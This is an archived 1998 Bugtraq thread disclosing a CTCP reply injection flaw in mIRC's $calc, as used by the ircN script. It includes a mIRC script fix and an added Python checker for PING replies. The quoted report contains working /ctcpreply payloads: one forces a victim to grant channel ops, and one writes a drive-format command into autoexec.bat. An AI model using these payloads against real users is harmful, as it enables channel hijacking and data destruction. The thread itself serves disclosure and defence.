Bugtraq mailing list archives

Re: Backdoor in ircN, popular mIRC script.


From: mox () SHELLZ NETREVOLUTION COM (Benoit Lefebvre)
Date: Thu, 23 Jul 1998 22:57:46 +0000


The bug is not only in ircN
It is in mIRC.

The problem is $calc(..)
ircN is just one of the scripts that use $calc to check the ping delay
e.g.: on 1:CTCPREPLY:PING*: { echo -a Ping reply: $calc($ctime - $2) }

To protect yourself, add this to your script:
on 1:CTCPREPLY:PING*: { if ($2 !isnum) { halt } }

--

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
   ___/   ___/   _____/ __/   __/         Benoit Lefebvre
  ____/ ____/  __/  __/  __/__/                 MoxImages
  __/___/__/ ___/  ___/  ___/   @shellz.netrevolution.com
 __/ _/ __/  __/  __/  __/ __/      http://www.mox.qc.ca/
__/    __/   _____/  __/    __/               ICQ: 858084
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

On Thu, 23 Jul 1998, Nick Koscianski wrote:

A backdoor has been found in ircN, possibly the most popular mIRC
script.  Using the command /ctcpreply, any user can make someone using
the backdoored versions do whatever they want.  For example:
/ctcpreply Dianora ping $mode(#us-opers,+o,hax0r)
will force Dianora to give ops to hax0r in #us-opers.

Also, they can be forced to run arbitrary programs, for example:

/ctcpreply Dianora $run(echo,"echo,y,|,format,c:\",>,c:\autoexec.bat)
will format this person's hard drive... definitely not good.

A bug fix for this problem can be found at http://www.vode.org/ircN


-KKR
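
The numeric check suggested in the reply above, shown as an added Python example run over constructed raw IRC lines. It is not mIRC script and not code from either poster. The function names, hosts and timestamps are assumptions; the `$mode(...)` text is the one quoted in the thread.

```python
import re
import time

# CTCP replies arrive as NOTICE text wrapped in \x01 bytes.
CTCP_REPLY = re.compile(
    r"^:(?P<nick>[^!\s]+)\S* NOTICE \S+ :\x01(?P<cmd>[^\s\x01]+) ?(?P<args>.*?)\x01?$"
)
# The PING argument must be a plain decimal timestamp (ASCII digits only).
TIMESTAMP = re.compile(r"^[0-9]{1,10}$")

# Constructed sample lines (nicks, hosts and timestamps are made up).
SAMPLE_LINES = [
    ":friend!u@example.invalid NOTICE Dianora :\x01PING 901234567\x01",
    ":hax0r!u@example.invalid NOTICE Dianora :\x01PING $mode(#us-opers,+o,hax0r)\x01",
    ":hax0r!u@example.invalid NOTICE Dianora :\x01PING 901234567$mode(#us-opers,+o,hax0r)\x01",
    ":friend!u@example.invalid NOTICE Dianora :just a normal notice",
]


def check_ping_reply(raw_line, now=None):
    """Classify one raw IRC line as ("ok" | "reject" | "ignore", nick, detail)."""
    m = CTCP_REPLY.match(raw_line.rstrip("\r\n"))
    if not m or m.group("cmd").upper() != "PING":
        return ("ignore", None, None)
    nick, args = m.group("nick"), m.group("args")
    token = args.split(" ", 1)[0]  # what an mIRC script sees as $2
    if not TIMESTAMP.match(token):
        # Treat the text as data only: log it, never evaluate it.
        return ("reject", nick, repr(args))
    now = int(time.time()) if now is None else now
    return ("ok", nick, now - int(token))  # plain integer subtraction


def scan(lines, now=None):
    """Return the verdicts for every CTCP PING reply found in lines."""
    results = [check_ping_reply(line, now) for line in lines]
    return [r for r in results if r[0] != "ignore"]


if __name__ == "__main__":
    for verdict, nick, detail in scan(SAMPLE_LINES, now=901234570):
        print(f"{verdict:6} {nick:8} {detail}")
```

The third sample line shows why the whole token has to be digits: a reply that merely starts with a number is still rejected.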



